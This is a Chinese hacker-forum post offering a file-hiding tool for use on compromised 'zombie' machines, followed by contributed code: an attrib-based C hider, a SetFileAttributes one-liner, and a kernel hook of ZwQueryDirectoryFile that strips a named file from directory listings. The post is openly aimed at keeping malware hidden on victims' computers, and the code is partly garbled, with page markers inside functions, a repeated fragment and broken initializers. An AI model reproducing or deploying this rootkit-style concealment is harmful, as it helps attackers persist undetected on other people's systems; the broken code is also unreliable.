呵呵~~我写的一个可以隐藏任何文件的小冬冬,就算选了显示所有文件也看不到哦!在DOS里可访问(说明还在),但用 DEL或DIR命令都无效哦!^_^给大家在肉机上玩玩吧,说不定(我说一定~)会让你的肉鸡晚飞几天(N久~),呵呵,有点自大了,发
[email protected]来骂我。
小玩意,下载地址:http://bbs.shop366.com/NOFILE.rar
以下是EvilOctal编辑添加内容:
冰血封情的仿照代码:
//Creditz Bideyore[E.S.T] and EvilOctal[E.S.T]
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
int main(int argv, char* argc[])
{
char string[256];
if( argv < 2 )
{
fprintf(stderr, "Proper Usage is: \n");
fprintf(stderr, "%s filename: \n", argc[0]);
return (1);
}
strcpy(string, "attrib +s +h ");
int stringl = strlen(argc[1]) + strlen(string);
if (stringl > 255)
{
fprintf(stderr, "ERROR!\n");
exit(1);
}
char * output = strcat(string, argc[1]);
system(output);
return 0;
}
下面是SWords的方法:
#include<windows.h>
int main(int argv,char *argc[]){
SetFileAttributes(argc[1],FILE_ATTRIBUTE_HIDDENFILE_ATTRIBUTE_SYSTEM);
}
下面是dahubaobao的代码:
NTSTATUS NewZwQueryDirectoryFile (
IN HANDLE hFile,
IN HANDLE hEvent OPTIONAL,
IN PIO_APC_ROUTINE IoApcRoutine OPTIONAL,
IN PVOID IoApcContext OPTIONAL,
OUT PIO_STATUS_BLOCK pIoStatusBlock,
OUT PVOID FileInformationBuffer,
IN ULONG FileInformationBufferLength,
IN FILE_INFORMATION_CLASS FileInfoClass,
IN BOOLEAN ReturnOnlyOneEntry,
IN PUNICODE_STRING FileName OPTIONAL,
IN BOOLEAN RestartQuery)
{
NTSTATUS ntStatus=STATUS_SUCCESS;
LPFILE_NAMES_INFORMATION FileCurr=NULL;
LPFILE_NAMES_INFORMATION FilePrev=NULL;
UNICODE_STRING FileNameWide=;
ANSI_STRING FileNameAnsi=;
ULONG FileNameLength=0;
BOOLEAN LastOne;
int Pos=0,Left=0;
KeAcquireSpinLock(&SpinLock,&Irql);
//请求原函数
ntStatus=((ZWQUERYDIRECTORYFILE)(OldZwQueryDirectoryFile)) (
hFile,hEvent,IoApcRoutine,IoApcContext,
pIoStatusBlock,FileInformationBuffer,
FileInformationBufferLength,FileInfoClass,
ReturnOnlyOneEntry,FileName,RestartQuery);
if (NT_SUCCESS(ntStatus) && (FileInfoClass==3)
{
//指向文件列表缓冲区
if ((FileCurr=(LPFILE_NAMES_INFORMATION)FileInformationBuffer)==NULL)
return ntStatus;
do {
LastOne=!(FileCurr->NextEntryOffset); //取偏移
[1] [2]
FileNameLength=FileCurr->FileNameLength; //取长度
RtlInitUnicodeString(&FileNameWide,FileCurr->FileName);
RtlUnicodeStringToAnsiString(&FileNameAnsi,&FileNameWide,TRUE);
if (_strnicmp("test.exe",FileNameAnsi.Buffer,(FileNameLength / 2))==0)
{
//最后一个文件
if (LastOne)
{
if (FileCurr==(LPFILE_NAMES_INFORMATION)FileInformationBuffer)
ntStatus=STATUS_NO_MORE_FILES; //隐藏
else
FilePrev->NextEntryOffset=0;
}
else
{
//移动文件偏移
Pos=((ULONG)FileCurr)-((ULONG)FileInformationBuffer);
Left=(ULONG)FileInformationBufferLength-Pos-FileCurr->NextEntryOffset;
//覆盖缓冲
RtlCopyMemory((PVOID)FileCurr,(PVOID)((char *)FileCurr+FileCurr->NextEntryOffset),(DWORD)Left);
continue;
}
}
//下一文件
FilePrev=FileCurr;
FileCurr=(LPFILE_NAMES_INFORMATION)((char *)FileCurr+FileCurr->NextEntryOffset);
}while (!LastOne);
}
if (FileNameAnsi.Buffer)
RtlFreeAnsiString(&FileNameAnsi);
KeReleaseSpinLock(&SpinLock,Irql);
return ntStatus;
}
(出处:http://www.sheup.com)
[1] [2]
}while (!LastOne);
}
if (FileNameAnsi.Buffer)
RtlFreeAnsiString(&FileNameAnsi);
KeReleaseSpinLock(&SpinLock,Irql);
return ntStatus;
}
(出处:http://www.sheup.com)
[1] [2] [3]